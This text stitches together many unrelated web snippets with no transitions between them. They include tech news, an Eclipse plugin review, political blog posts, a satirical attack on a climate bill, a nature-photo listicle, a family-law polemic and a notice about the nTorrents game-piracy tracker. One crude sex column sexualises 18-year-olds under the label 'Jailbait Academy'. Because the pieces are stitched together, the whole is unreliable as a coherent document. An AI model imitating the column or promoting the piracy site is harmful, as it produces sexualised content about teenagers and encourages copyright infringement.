Advertisement
The interview elicited a few weirdly confident remarks from Yahoo's CEO , in which she forecasted trouble for her fellow search engineers :
Google is going to have a problem because Google is only known for search ...
It is only half our business ; it 's 99.9 % of their business .
They 've got to find other things to do ... Google has to grow a company the size of Yahoo every year to be interesting .
Advertisement
Thankfully , Nick Bilton of the New York Times just recently put together a handy chart that makes comparing the big tech empires easy , and at a glance it shows that Google does indeed have its fingers in as many pies as Yahoo does .
They just do n't link to all of them on their homepage .
G/O Media may get a commission Subscribe and Get Your First Bag Free Promo Code AtlasCoffeeDay20
Still , Bartz might be right when she says that Yahoo's expansive portfolio will serve it well in the long run .
It 's just that it will take some serious reorganization to make it anything more than just " interesting . " [ BBC ]
The Following 125 Users Say Thank You to kojacker For This Useful Post :
Using Eclipse Helios with the dev-version of the new Scala ( 2.8 ) plugin , as there is n't an official release yet .
That is beta , definitively -- but I can't confirm the frequently expressed opinion that this plugin is outright horrible ;-)
I 'd say , the experience is already OK - ish , and indeed better than the current state of affairs with the Groovy plugin .
OTOH , the experience with plain Java is way more smooth ( feels like flying at times ) , and the current CDT I 'd rate somewhat in between .
Incremental compile and error highlighting work quite well for me ; tweaking a DSL implementation into form just by continuously rewriting your code until the error markers are gone -- without ever having to test - run your program -- is outright fun and just again shows that FP / static typing rocks !
Problems encountered from time to time : - implicits and nested types in other compilation units ( esp. nested / super packages ) are n't picked up at times when there are still other errors around ; they will be picked up after an full build - there seems to be a memory leak in the version I 'm using right now ( from end august 2010 ) , necessitating to restart the workbench after some hours of work - beware when you 're using AspectJ , to make sure you get a version of the Scala plugin which relies on a JDT weaving bundle version which also works with AJDT
PS : I 'm using maven builds in all my projects and generated the eclipse projects with the eclipse - maven - plugin , and then imported them as plain - flat eclipse projects .
I can just strongly recommend everyone to keep away from the M2 - eclipse plugin ( for maven ) in its current ( 2010 ) state , it makes your workbench painfully slow , is buggy and has lots of almost unpredictable behaviour , because it constantly tries to do magic things behind the scenes ( and besides that , the aspectj support is broken since this spring )
Reactions to the Gulf oil spill have , I suppose , been predictable .
Sure enough , a substantial part of the right quickly jumped on the thought that since it seems to validate environmental concerns , it must be a dastardly plot by environmentalists .
Meanwhile , much of the press floated the idea that this was “ Obama ’s Katrina ” — despite the fact that the administration responded as quickly as anyone could reasonably have expected , and anyway there was n’t much it could do .
What I did n’t quite expect , however , was the extent of revisionism I ’m seeing about Katrina itself .
Again and again , I ’m seeing people claiming that tales of Bush administration failure were just a falsehood spread by the liberal media , that those left - wing crazies were blaming Bush for an act of God .
I mean , people , we all watched it as it was happening .
Here ’s a timeline if your memory needs jogging .
Bush was n’t blamed for the hurricane ; he was blamed for the fact that thousands of American citizens were suffering in squalor — with reporters on the scene ! — while receiving no help , and with administration officials cheerfully praising themselves for the heckuva job they were doing .
( I somehow forgot that the Brownie line was delivered on Friday , four days into the nightmare ) .
Bush was also blamed for the incredible degradation revealed at FEMA , which literally had no idea how to do its job .
So how can people be trying to claim that Bush did nothing wrong ?
I guess it ’s a question of what to believe , the party line or your own lying eyes — and for a lot of people , the eyes do n’t have it .
America ’s First Family , Boomer parents ’ edition America ’s First Family , Boomer parents ’ edition
The Boomers are the first TV generation .
We ’ve been intimates of television since its infancy as the mass medium of choice for Americans .
Because of television ’s limited options in those days , most Boomers , at least as children , lived with fewer than 6 channels and only 3 networks ( although there were nascent public television systems , many viewers were unable to receive their signals ) .
There was also the old Code of Practices for Television Broadcasters .
This set limits on the material presented on TV – and also served , good or ill , as a unifier of messages .
We Boomers learned a lot from television .
TV was quasi parent / sibling / best friend during the maturation of the majority of Boomers .
Families watched TV together – and the messages of television programming were designed with families both as subject – and as message .
The early years of Boomer television watching were dominated by shows with wise ( if often exasperated ) fathers , nurturing ( if occasionally scatter - brained ) mothers , and children who learned lessons .
Boy Boomers and Girl Boomers received different lessons – both from the shows ’ texts and from their subtexts .
But lessons there always were .
Gee , Wally … .
The Television ( not Teflon ) President … The Television ( not Teflon ) President …
And then came JFK .
Newscasts during the wonder years of the Boomers were pretty uninspired affairs .
First Douglas Edwards at CBS , then Chet Huntley and David Brinkley at NBC presented news with the distant aridity of the distant , arid president they reported on : delegator - in - chief Dwight Eisenhower .
Even at his most meaningfully prescient , watching Ike is about as riveting as watching paint dry .
And the news programs of his times reflect that .
From his breakthrough appearance in the first Kennedy - Nixon debate onward , Kennedy fired the imagination of Boomers like no public figure before him – or since .
He was young , good - looking , and smart .
His wife was beautiful , his children were Boomers , too , and , when he gave his inaugural , he became a bona fide television star .
And since we Boomers loved our TV stars , we embraced Kennedy – with a fervor that has never abated .
From the beginning Kennedy ’s presidency created a narrative that somehow inspired – and elevated – nightly newscasts .
CBS would replace its anchor with a figure who would become a Boomer icon – Walter Cronkite – whose avid support of Kennedy ’s pet project – the space program – led to his ascent as the network news anchor .
And the sequence of events that formed the arc of the Kennedy presidency – from the debacle of the Bay of Pigs ( with Kennedy ’s humiliation in full view of the nation ) to the Kennedy push to force Southern states to accept integration ( with the stunning pictures of Southern police unleashing high pressure fire hoses and attack dogs on peaceful demonstrators ) to the triumphs of the American space program ( with its interminable “ holds ” and ultimately thrilling liftoffs and reports from the astronauts – who became TV stars themselves ) to the terror of the Cuban Missile Crisis ( with its final grand performance by the brilliant Adlai Stevenson , his reputation as American statesman rescued by Kennedy ) made for great television .
And his assassination and funeral , televised nonstop for 4 days from November 22nd – 25th , 1963 , affected Boomers in profoundly spiritual ways .
Many Boomers lie about having been at Woodstock – almost none have to lie about watching Jack Ruby murder Lee Harvey Oswald on television .
The median age of a Boomer at the time of Kennedy ’s assassination was approximately 12.5 years – Bar / Bat Mitzvah age – the age when one must accept the responsibilities of adulthood .
Seeing our young , heroic ( to us Boomers , at least ) president cut down for no clear reason made adulthood and all its traditional trappings – parental , professional , and especially civic responsibility – seem a thing to be rejected .
The New Role Models … The New Role Models …
This is what social scientists refer to as an existential moment – the moment when one ’s view of life and the world is significantly shaped for the duration of one ’s existence .
For the Boomer generation , JFK ’s assassination might safely be called the existential moment .
But what else could we do ?
Did we have to follow the path our parents – and JFK – laid out as right and proper ?
Could there be another path ?
Ten weeks later television would show Boomers ( especially males ) what seemed a great new option to traditional adulthood ….
( Part 3 to come … . )
Mark Zuckerberg may have finally had it with all the criticism .
Some users of Facebook are suggesting that the social network 's CEO has punished them for having the audacity to question Facebook 's business practices and make satirical comments about Zuckerberg .
Facebook disabled Kurgan Von Lichtenstein's account , that much is clear :
Though still in Google 's cache ( see image below ) , the account 's profile page is now listed as " not found " by Facebook .
Von Lichtenstein said in a comment on the social news site Reddit — a comment with 313 " upvotes " — that his account was disabled within a day of posting this critical message under a four - year - old blog post from Zuckerberg :
There are any number of reasons Facebook might disable an account , outside of squelching dissent , but Von Lichtenstein insists on Reddit that he did not " spam " out inappropriate content and that " that was the only time I posted anything in that comment section , or about Zuckerberg at all for that matter . "
As it happens , we also received an email from a Facebook user whose group " Mark Zuckerberg Masturbates To Facebook Updates " was deleted for violating Facebook 's policy against " hateful , threatening , or obscene . "
Sounds about right !
Thing is , the group had been going for four years .
So while it 's possible aggrieved users have become overly sensitive to Facebook 's evil side , it 's also possible Zuckerberg has gotten tired of the growing body of critical writing about him .
[ Photo of Zuckerberg via Getty .
Photo of old Facebook HQ via Wikipedia ]
During NBC ’s pre-upfront conference call this afternoon , NBC brass were asked to comment on The Office star Steve Carell ’s recent remarks in a BBC radio interview that he intends to exit NBC ’s top comedy series at the end of next season when his contract is up .
NBC ’s primetime entertainment president Angela Bromstad said : “ We hope we can keep him around for a long time . ”
( That could happen even if Carell leaves The Office as he has a producing deal with sister studio UMS ) .
But NBC Uni TV Entertainment chairman Jeff Gaspin added : ” The Office is a great ensemble show , and the producers are preparing in the event he chooses to move on . ”
Who do you think should take over the leading man role on the show if Carell leaves ?
I often hear sexually naïve people in their mid-to - late twenties say that there 's nothing they 'd rather fuck on God 's Good Green Earth than a nubile 18 - year - old .
These people have obviously not slept with a teenager recently .
It ’s not all it ’s cracked up to be ( for starters , teenagers are usually horrible at fucking .
But that ’s another story . )
The main issue , though , is recent grads of Jailbait Academy are creatures that are hopelessly hooked on two things : their friends and technology .
A one - night stand with a teenager often becomes an unintended three - way between you , them , and their iPhone .
I witnessed , and ignored , the warning signs that things were a - changin ’ while watching porn in college in 2004 .
During Paris Hilton ’s dead - eyed turn in One Night in Paris , the eponymous starlet stops the bland missionary poundfest she ’s receiving to answer a phone call ( hopefully from a friend receiving a similarly bland missionary poundfest . )
While Paris blah - blahs to her buddy , her partner sits there stroking his shrinking ding - dong , whining about the ridiculous situation he , as a grown - ass man , has found himself in .
Watching it I thought , " Ha ha , only teenage celebrities are so addicted to their phones that they absolutely cannot ignore them , even during shitty fucking . "
Ah , but how trends trickle down from above … 2010 teens and technology are just as inseparable if not more so , and you wo n’t realize how true this is until you become privy to it firsthand .
The outside world calls , even mid-coitus .
This , in itself , is nothing new .
But the difference is teens answer that call , even to say “ I ca n’t talk right now .
Yeah .
I ’m busy .
I ’ll tell you later .
Love you too , bestie ” ( they do this in movie theaters too ) .
Same goes for texts , by the way .
Even if they have to respond with a quick , elaborate emoticon , they will .
As a grown - ass adult sleeping with a teen , you can tell your partner to turn off the cell .
But just by the fact that you have to go there - “ Turn off your phone .
This is our time ! ”- you do know who you sound like , right ?
We ’re already dealing with a Mommy / Daddy complex already , no need to lay it on thicker .
Besides , nothing dries vaginas and kills boners dead like acting like a disapproving parent .
The thing that makes today ’s teenagers unique in the history of fucking is that they ’ve never known a world without the internet , without mobile phones , without their manna ( their friend ’s approval ) so easily accessible .
It ’s a shame .
When I was a teenager , tepid sex was a time to get inside your own head and beat yourself up emotionally , with no avenue of escape , just totally isolated .
Sadly , today ’s teens will never know that feeling .
It ’s just a fundamental difference in generations : like most teenagers , today ’s 18 - year - olds ultimately just want constant stimulation and constant peer validation .
Thanks to modern technology , it ’s something they can get from a Blackberry .
Engaging in a bland missionary poundfest with a grown - ass adult just is n’t the same .
I hope that all the U.S. readers have already memorized the new , 987.654321 - page law penned by John Kerry and Joe Lieberman ,
American Power Act ( PDF , full text ) .
1 ( b ) LOAN GUARANTEE RETENTION FEE .
— Section
2 1702(h ) of the Energy Policy Act of 2005 ( 42 U.S.C .
3 16512(h ) ) is amended —
4 ( 1 ) by redesignating paragraph ( 2 ) as para -
5 graph ( 3 ) ; and
6 ( 2 ) by inserting after paragraph ( 1 ) the fol -
7 lowing :
8 ‘‘(2 ) LOAN GUARANTEE RETENTION FEES . —
9 ‘‘( A ) IN GENERAL .
— The Secretary shall
10 charge and collect a loan guarantee retention
11 fee from each advanced nuclear energy facility
12 project described in section 1703 ( b ) ( 4 ) to which
13 the Secretary has made a guarantee under sub -
14 section ( a ) .
15 ‘‘( B ) FEE STRUCTURE . —
16 ‘‘( i ) GRACE PERIOD .
— The Secretary
17 may not charge or collect a loan guarantee
18 retention fee from a project described in
19 subparagraph ( A ) until the date that is 5
20 years after the date on which construction
21 of the project is completed .
22 ‘‘( ii ) FEE STRUCTURE .
— With respect
23 to a project described in subparagraph ( A ) ,
24 the rate for the loan guarantee retention
25 fee shall —
12 ( 11 ) if unchecked , the impact of climate change
13 will include widespread effects on health and welfare ,
14 including —
15 ( A ) increased outbreaks from waterborne
16 diseases ;
17 ( B ) more droughts ;
18 ( C ) diminished agricultural production ;
19 ( D ) severe storms and floods ;
20 ( E ) heat waves ;
21 ( F ) wildfires ; and
22 ( G ) a substantial rise in sea levels , due in
23 part to —
24 ( i ) melting mountain glaciers ;
25 ( ii ) shrinking sea ice ; and ...
1 ( iii ) thawing permafrost ;
2 ( 12 ) the most recent science indicates that the
3 changes described in paragraph ( 11 ) ( G ) are occur4
ring faster and with greater intensity than expected ;
5 ( 13 ) military officials , including retired admi -
6 rals and generals , concur with the intelligence com -
7 munity that climate change —
8 ( A ) acts as a threat multiplier for insta -
9 bility ; and
10 ( B ) presents significant national security
11 challenges for the United States ;
It 's a very simple , intuitive , comprehensible , and concise piece of text .
As a homework exercise , try to use the document above to prove that it 's impossible to steal $ 1 billion from the system by a simple trick .
Easy ?
Shakespeare would be proud about the prose , e.g .
It looks like a web page by Nigel Cook .
Multiply the page above by 987.654321 to have an idea about the beauty of the proposed bill .
If you wonder why the document has 987.654321 pages , it 's because if you ask 8.00000007 blondes to read it , each of them will have to read 987.654321 / 8.00000007 = 123.456789 pages . ;-)
Aside from the random page above , let me choose another cute piece of law :
That 's a lot of consequences that must occur if the carbon indulgences are not sold .
I wonder who will enforce all these paragraphs .
Is the U.S. Congress or the White House obliged to ignite all the wildfires , melt glaciers , and flood cities ?
Or is Nature required to obey ?
What will the enforcement forces do to Nature if She refuses ? :-)
Entertainingly , the bill continues :
The paragraph ( 12 ) looks like " you shall love one God only " .
In ( 13 ) , we learn that military officials concur that global warming is worse than Al Qaeda .
What happens to the military officials who violate the law and confirm that AGW is a pile of rubbish and Kerry and Lieberman are being imbeciles ?
Will they be arrested or executed for having violated this law ? :-)
More seriously , what I am saying is that laws should normally determine how people and institutions of the government co-exist .
They should n't be describing the opinions of the authors and their favorite retired generals about the floods in the year 2054 .
;-) Sean Carroll who calls the draft esoteric knowledge suggests that Stephen Spielberg and Jay Rosen should establish a news channel that would explain the bill .
If even guys who can run the Universe backwards and remember the future as easily as they remember the past have a problem with this simple bill , it might be hard , after all .
Well , indeed , I would like to know how many people have actually read the draft , at least once .
If the number is between 0 and 2 , is the hidden assumption that the 0 - 2 authors of the text are infallible so that they can design a 987 - page mechanism to meaningfully redirect trillions of dollars ?
What is comprehensible are the plans - that make the communist 5 - year and Nazi 4 - year plans modest in comparison .
This is the carbon emissions in 2010 :
By 2020 , the emissions have to drop by 17.031415926535 percent below the 2005 levels ( a number that was surely calculated by a unique , canonical procedure to save the world ) .
In ten years , the emissions will look like this : Finally , by 2050 , the emissions have to drop by 83.0271828183 percent below the 2005 levels .
They will look like this :
Of course , the accurate numbers were jokes .
In reality , the numbers are 17 % and 83 % , exactly .
Note that the sum of 17 % and 83 % equals 100 % - that 's neat !
In the same way , the sum of 2020 and 2050 equals 4070 .
Kerry and Lieberman have clearly done a great job . :-)
Good luck , America ! ;-)
Glenn Beck shows how Fannie Mae , Goldman Sachs , and the network of their friends will make you a happy citizen of the global carbon - free village .
The ' Tales from the Afternow : Little Rocks ' animation is finished and is heading to a film festival near you .
Checking the ' Little Rocks ' page for the festival dates !
Without a shred of doubt , most people will agree that the most beautiful images and scenes are that of nature .
One can say , as a matter of fact , that a simple picture of an empty beach or that of a butterfly leaving its cocoon most often captures the attention of its onlooker .
Nature is vast and unlimited .
It transcends human comprehension and understanding .
So , we can only gaze , enjoy and marvel at its casual magnificence and simple complexity .
Nature photos and images usually cast an indescribable effect on us .
They can be comforting , inspiring , mesmerizing , stunning and exciting all at the same time .
Sometimes you could happen upon a nature photography and be lost in the visual caress and mental fondling it brings you .
“ Those who contemplate the beauty of the earth find reserves of strength that will endure as long as life lasts . …
There is something infinitely healing in the repeated refrains of nature — the assurance that dawn comes after night , and spring after winter . ” — Rachel Carson , Silent Spring
Ever seen stunning pictures of flowers as they blossom ?
That ’s nature in play , and here ’s a collection of beautiful flowers .
You can check out this post about beautiful tree photography too , you wo n’t be disappointed .
So , being a lover of nature and all things nature , I went around and made a huge collection of nature images .
This collection contains beautiful images of nature in play , most of which you might not have seen before .
It includes photographs of trees , landscapes , fields , parks , wildlife , sunsets , sun rises , and so on .
They are masterpieces that can only be taken by talented photographers .
Hope you will find them inspiring !
Do n’t forget to share too .
In this article you will find :
Iconic nature photography
Breathtaking landscape photos
Photos of colorful and serene nature parks
Awesome wildlife photos
Miscellaneous nature photos
Tips for taking nature photographs
Iconic nature photography
First of , I present you this modicum of exquisite nature photography .
You can easily say this is nature photography at its best .
Barn Reclaimed by Nature
A Beautiful Scene of Nature .
This barn , left alone years ago , was reclaimed by nature in its own way .
Absolutely stunning .
Iceland – the power of nature
Iceland Waterfall Showing the power of nature .
You can guess the expression on the face of the guy experiencing this .
It is simply majestic .
Face In Nature
Four people sit down to take a moment to admire the mesmerizing scenery of this mystic mountain .
Transylvania
There are thousands of words you could use to describe this scenery of contrasting greens .
Me , I ’m speechless .
Genesis of a New World
This is a shot of the likely genesis of a new world .
The view is wow .
Thor ’s Well
Conversation by the Stone Fire
Lost in colors
The Wall
Breathtaking landscapes
Next , I present you this collection of breathtaking landscape photography .
These are landscapes in different kinds of weather and different areas .
All you have to do is stay calm and absorb the magic . 🙂
The Goddezz
emptyness
Who knew a canoe on a pond will blend so well with this background to create this indescribable effect ?
The sun ’s afro
Beautiful Apocalypse
This , by no doubt , is a stunning picture .
Notice the contrasting colors of the sky ?
Falling Trees
A beautiful sunset .
Columbine Island Sunset
Wonderland
Arctic Alps
Awe
No Boat - Trip
In Solitude IR
Maloti Pass : Reprocessed
moonlight
Timeless Obsession
Peace of mind
I am nothing , in the dark
Breaking Dawn
First Light
Desert Storm 2
equilibrium
Lovely sky
Away from the shadows
Midst of Solace
Nature
In The Field
break down
Perfect nature RELOAD
Lost In Nature ’s Thought
Lovely Nature
Nature Parks
Trees are beautiful and a combination of trees can give one an enthralling effect .
This is a collection of photos of natural parks and trees and forests .
Enjoy .
Autumn Sun
Bask in the glory of the autumn sun .
Nature …
Here is nature , captured in one of its purest form .
The waterfall , greens , and flowing stream all combine to form one beautiful nature scenery .
Highness
dream line
A rail line during the forest at autumn .
In a trance
Background 6
Lone Tree
Golden Sunset …
Flash of Color
Deep Silence
The Fallen Son
Nature ’s Kingdom
Road Mist
Green Is Green
Madeira – Fanal 1
Seeing is believing
Path in Owlish Mountains
Sakura Awakens Anew
Wildlife Nature Photography
This is a collection of pictures showing the little things in wildlife .
Kudos to the photographers who took these pictures , they all masterpieces .
Nature ’s Tear
Beauty of nature
The Nature of Love
Nature ’s way of displaying love .
On Guard
About grace of migratory birds
Wonder Land
Attraction
numero uno
Wings of fury
Duo tone
Nature
Eaten alive
occupied house
Spider
Onion Sprout
Frozen Nature
nature stars II
Miscellaneous Nature Photos
Finally , we have a collection of nature images taken at random .
Note that these pictures are equally inspiring and stunning as the others , if not more .
snow and fire
Little tree on water
If only …
Low pass
Silent Beauty
Morning drops II
Outcast
Nature
fury of nature
Nature ’s Fan
Nature Photo
nature
unique sunset
Nature ’s Heart
Quiet shrub
lightening at sunset
Tips on Taking Beautiful Nature Photography
Beautiful photos are taken by talented , brilliant photographers .
There ’s a lot one needs to know in order to take nature photographs that will really stand out .
So here are a few photography tips and techniques for taking photos of the natural world :
Do n’t always put the subject of your photo in the center .
This might seem odd , but remember that the subject of your photo is n’t going to be the only thing in it .
However , everything depends on how it blends with its surrounding .
Get out early .
Not only is the early morning light usually good , you ’ll also avoid the crowds that gather later at popular places .
Appreciate overcast days , and make the most out of them .
Their diffused light can make for increased color saturation in your images ,
Try shooting birds in a natural background without man-made objects such as utility poles , wires , fences , and buildings , which compete for attention .
With a good tripod , you can set up and be ready when the lighting is right .
However , do n’t be afraid to handhold at slow shutter speeds — the serendipitous effects can be wonderful .
When you decide what makes you want to photograph a place , think of adjectives to describe it — and include a detail in your photograph that conveys that adjective .
If you are taking wildlife photographs , use a shallow depth of field for close - ups to blur out background distractions .
When photographing details of nature , try different angles — above , below , from the side , and so on — to find the most interesting composition .
In addition , it is always good to take the photos at different angles .
The best lens for bird photography is a telephoto with a focal length of 400 mm or greater .
Hence , a 70 mm - to - 300 mm zoom works well for birds that can be approached closely .
Also , you can use a tripod for lenses which are longer than 300 mm .
In addition , here ’s a video offering more tips .
That ’s all .
Hope you enjoyed it - and do n’t forget to share .
This FAW Limousine we spotted here in Beijing is Chinese President Hu Jintao 's official car .
It 's part rip - off Rolls Royce Phantom , part copied Cadillac , and a healthy dollop of wacky retro-futurism .
Hold onto your butts , this faux Cadillac One 's strange .
Advertisement
China 's about 50 years behind the U.S. in some respects and 100 years behind in others .
So , if you think about it , the retro- futurism mixed with blatantly ripped - off styling makes a lot of sense as the car for China 's President to be driven around in .
Today I viewed a disturbing website .
It ’s called Justice4 Mothers .
The idea that mothers deserve justice is not disturbing .
I believe that everybody deserves justice regardless of gender or sexual orientation .
And it ’s not that every one of the articles on the site is alarming , either .
But one particular article riled me up a bit .
The article is reposting of a twisted reposting entitled Attention Judges and Lawmakers :
This is the REAL AGENDA of the Father ’s Rights Movement
I do n’t consider myself a father ’s rights activist , so the reason the reposted articles bother me is not that they put down father ’s rights groups and I ’m somehow personally offended by this .
I ’m an advocate for the rights of parents and children of both genders .
There ’s no question in my mind that sometimes its the mothers who are shafted by the courts , sometimes it is the fathers , and usually it is both .
And usually , the children are victimized right along with one or both of their parents .
The main two reasons I ’m alarmed by this article are :
The article is a mockery and distortion of author Rachel Alexander ’s original work .
I would n’t like to see this done to my writing and empathize with how Rachel Alexander feels about it .
The article serves to further harm all children and parents .
It largely consists of a reposting of vitriolic tripe from an hack job reposting of her work at the web page How Fathers Can Win Custody to Avoid Paying Child Support .
Rachel Alexander Rachel Alexander
I compared the reposted articles versus the original article Guide : How Fathers Can Win Child Custody on the Intelligent Conservative .
The World O’ Crap version is totally different from the Intelligent Conservative version .
It appears to be a mockery of the original article .
It quotes bits and pieces of the original work interspersed with extreme distortions to make the original words look ridiculous .
But the Justice4 Mothers reposting has made the matter worse by removing the formatting that made it somewhat clear what the original words were versus the spin-job .
Rachel Alexander is aware of the mockery being made of her article by the World O’ Crap website and their distorted hack job on her writing .
View Rachel Alexander ’s posting archive page and scroll down to the bottom .
You will notice how displeased she is about that warped spin on her writing :
( from Rachel Alexander ’s posting archive page )
Note to the haters : Ms. Alexander has never posted on a salon.com blog called World o Crap and to say otherwise is false as well as libelous .
Mother ’s Rights Websites : Too Many Espouse Rabid Extremism
The tactics mentioned in the spin - job reposts are purported as being applied by men to ruin their ex-wives and ex-girlfriends to obtain 100 % child custody .
However , these same destructive and selfish tactics are applied by women , too .
By perpetuating and spreading the distorted views from World O’ Crap , Justice4 Mothers is doing children and parents , including mothers , a grave disservice .
Sadly , it is just one of many “ angry women ” web sites that is creating such a bad impression of women and mothers .
Without knowing more about the people behind these sites , I ’d hazard a wild guess that they are either guys posing as extremist women to make a point or they are personality disordered vindictive and likely abusive women .
But whatever the case may be , the result is not good .
Extremism and sexism are common problems with far too many “ mother ’s rights ” web sites .
We ’ve been noticing recently that there are slew of them that are quoting from and linking to our articles .
While typically this would be fine with us , it is alarming to see how these web sites distort the facts in an attempt to trash fathers and men in general that not only does a disservice to fathers , but also seriously harms children and good mothers , too .
Some of them appear to be going after particular men , going so far as to doctor photographs of fathers to make them look creepy .
Canadian author Michael Murphy of the web site Parental Alienation Canada and others have been slammed by some of these web sites as he describes in his article The Cyber Stalkers from OZ are back again with their not so secret – secret service .
What these web sites are doing is not productive .
Blindly stereotyping child custody warfare perpetrators by gender is n’t helpful .
It actually increases the odds of these battles continuing , ensuring the demise of more children , parents , and families due to the ongoing systemic failure to reform the broken family law courts and family and domestic relations laws .
Balkanization Of Family Law Reform Advocates
Polarizing family law problems along gender lines serves the purposes of those who would like to perpetuate the tragedies of today long into the future .
The polarization pushed by “ gender rights ” groups balkanizes those who oppose the current system .
It serves the divide and conquer tactics of the power - elite in government and lobbying groups who conspire with them .
These groups are happy to pit men and women against each other in a fight to the death over child custody .
The government and lobbying groups that interfere with family law reform regard divorce as a sort of financial equivalent to the energy output of nuclear fission .
Break apart an atom by fission and you get some energy .
Break apart lots of atoms and you get a chain reaction that might blow up a lot more than just the decomposing atoms .
Likewise , breaking apart lots of families releases large stores of cash .
The people behind are often “ irradiated ” severely , leading to long term ruination by psychological , emotional , and financial devastation .
Others are figuratively incinerated by the nuclear divorce blast .
Both outcomes are desirable for many judges , lawyers , CPS social workers , police , psychologists , and collection workers who comprise the divorce , domestic violence , and child support industries .
That ’s because the destruction of children and families helps ensure their financial security by sucking the lifeblood out of families .
Additional revenues are gained by hocking off the pieces of what remains after mommy and daddy have repeatedly shot each other with legal bullets for several years and the children have had holes blasted in their souls by the conflict .
Child support begets a whole new government bureaucracy that serves to take from some to give to others while taking a cut along the way and abusing anybody who disagrees .
Money does n’t lead to good parenting , but wars over child support money lead to damaged and even dead children and parents .
Then those damaged children turn into ready enablers of job security for CPS , police , and psychologists because they tend to become depressed , anxious , antisocial , and even criminal .
Many of them will go on to abuse their own children in the future and repeat the mental illness , divorce , child abuse , and crime cycle .
Both Genders Culpable
Both men and women abuse the family law courts and their children .
I understand that it is often very hard to be objective about this when your personal experience stems from the nightmare bullying , lying , harassment , and even parental alienation pulled on you and your family by your ex-wife or ex-husband .
But the failure to be objective leads to false generalizations that only women or only men commit abuses and crimes in child custody battles .
This is foolish , intellectually dishonest , and counterproductive .
It is as moronic as generalizing that all men are evil genocidal maniacs because Hitler and Stalin were both men .
It is just as idiotic as claiming that all women must be witches because in Salem they executed many of them and the common ( but inaccurate ) perception is that all were females .
American Divorce Courts : The New Salem Witch Trials
Sadly , family law courts and the polarized bickering around them today are much like the Salem witch trials .
Reality has been tossed out the window .
Due process has been stabbed in the back and left to die .
Innocent people are being ruined by false and bizarre allegations .
Children are being seriously harmed .
And the insanity continues largely unabated .
Meanwhile , the government and its power - hungry agents benefit from the chaos .
What ’s In A Name ?
There are many well - intentioned family law reform groups with the words mother , father , men , or women in their names .
Unfortunately , there are many groups with such names which are not at all well - intentioned .
If you ’re fed up with the family law system and are thinking about starting a group in your area , do yourself a favor — avoid the gender bias in your name .
Stick the words “ parents ” or “ children ” or “ families ” in your names and avoid any hint of identifiable gender bias that might get you lumped together with the gender extremists .
Gender Polarization Ensures No Solutions
Both the mother ’s rights and father ’s rights bigots are doing themselves and more importantly their children no good .
The government and its parasitic allies enforce their family - busting policies to turn parents on each other to drain them of their assets and transform their children into fountains of money and job security .
By polarizing the unquestionably wronged populace of broken families , the gender rights groups are simply enabling more of the same .
These problems simply will not be fixed until there is a stop to the gender wars over child custody and family law .
Further Reading
Unconstitutional Child Custody Decisions
Republicans Fail to Offer Family - Friendly Policy Choices
Holding Family Law Judges Accountable
Men ’s Rights : Feminism should be about equality — for males too
Cathy Young Criticizes Slate / Salon Hit Job on Family Court Reform Movement in Forbes
Battered women – and men
Hamas naval policemen holding Palestinian flags patrol the sea off the coast of Gaza City in preparation for the arrival of the flotillaPhotograph : Mahmud Hams / AFP / Getty Images
Traditionally , people have wanted to throw out the bums in Congress , but just not their own .
Their own representatives were the good guys , it was everyone else who was a bum .
Not this year .
People want Democrats to control Congress after this fall 's elections , a shift from April , according to an Associated Press - GfK poll released Saturday .
But the margin is thin and there 's a flashing yellow light for incumbents of both parties :
Only about one - third want their own lawmakers re-elected .
The tenuous 45 percent to 40 percent preference for a Democratic Congress reverses the finding a month ago on the same question : 44 percent for Republicans and 41 percent for Democrats .
The new readout came as the economy continued showing signs of improvement and the tumultuous battle over the health care law that President Barack Obama finally signed in March faded into the background .
So good news , bad news .
Good news ,
Dems are improving their numbers .
Bad news , 59 - 60 percent of incumbents ( in both chambers ) are Democrats .
Still , the trends are definitely trending back our way :
The only pollsters currently showing the GOP with the generic congressional ballot are Rasmussen ( of course ) and Fox .
But the generic ballot is only half the question .
The other is voter intensity , and on that front , we 're still lagging .
The good news is that the gap is closing .
Republican registered voters ' enthusiasm about voting in this year 's midterm elections has declined significantly in recent weeks .
As a result , Republicans ' advantage over Democrats on this measure has shrunk from 19 points in early April to 10 points in the latest weekly aggregate .
We saw the same thing in our own weekly Research 2000 poll :
After spending a couple of weeks spreading back apart , the " enthusiasm gap " between Democrats and Republicans narrowed noticeably this week .
Last week , that gap was ten points ( with 75 % of Republicans indicating certainty or likelihood of voting , versus 65 % of Democrats ) .
This week , that gap was whittled down to seven points .
Democrats basically held steady ( 64 % ) , but the GOP gave back some of their recent gains in intensity , with 71 % of Republicans indicating their strong propensity for voting .
In both cases , note that Democratic intensity has n't increased , but Republican one has decreased .
That 's not a safe place to be , but regardless , the less motivated they are and remain , the better off we 'll be come November .
There 's nothing we can do about dominating the ranks of incumbents .
We just gotta work toward making sure Republicans feel the brunt of that sentiment as harshly as Democrats do .
I’VE been writing on some weighty topics lately — too little money , too many choices , too few jobs .
It ’s time , I decided , to move on to some questions that haunt me almost every day .
How much soap should I put in my washing machine and dishwasher ?
Do I need to do more for my dryer than clean that little pull - out lint catcher ?
Should I rinse my dishes before putting them in the dishwasher ?
Most of us learned how to use a washing machine or dishwasher in our parents ’ house many years ago and have n’t really changed our methods , even though most appliances have evolved radically since then .
We rarely , if ever , read the manuals when we buy a new one or glance through the instructions on the box of detergent or bottle of dishwashing liquid .
But because we ’re probably using these appliances incorrectly , our dishes and clothes may not be coming out as clean as they could be .
And we may also be damaging the machines .
During the past couple of years , nTorrents has been a premier destination for those seeking to download Nintendo video games .
Being one of the first private trackers to migrate to the now famed Gazelle codebase , nTorrents gained huge popularity even though it catered to a smaller niche in the gaming community .
Despite its popularity , NT administration is planning to shut down the site pretty soon .
Plans for the the site ’s XBOX360 torrents section which was to be morphed into a separate private tracker called xTorrents , have also been scrapped .
However , it ’s not as bad as its sounds - NT crew will be launching PWNNetwork , a brand new games tracker that will not limit itself to a single gaming platform but cater to a wider user base comprising of both PC and console gamers .
In short , PWN will be the future of NT .
As of right now , PWN seems to be in a closed , private beta testing phase .
Although the site is live , registrations are not open and there is no recruitment going on in any of the BitTorrent forums or on IRC .
Existing NT members who purchased a ticket in their last raffle will be invited in by staff as beta testers .
The full announcement regarding the change ( quoted from NT homepage ) is posted below :
Ladies and gentlemen , the big news .
NTorrents is closing , our xbox sister - site XTorrents is not going to be released .
We 're simply combining resources into a powerful gaming tracker instead .
All your favorite staffers , a few new ones , and a fresher ( less buggy ) gazelle code .
Combine this with a new look , including a few modifications , along with our reputation of an outstanding community .
We welcome you to PWNnetwork .
net .
Why is this happening you ask ?
